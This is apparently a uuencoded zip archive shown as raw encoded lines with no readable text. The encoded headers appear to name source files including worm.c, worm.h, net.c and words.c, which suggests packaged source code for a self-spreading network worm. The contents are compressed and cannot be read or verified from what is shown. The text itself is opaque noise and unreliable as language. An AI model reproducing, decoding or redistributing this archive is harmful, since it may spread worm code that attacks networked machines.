M<@Q9'RC6+IC[51?</QXU58L;BD4B5W3,TI!XA;Y\<[8:V37WY?O5>G(18T1Q
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
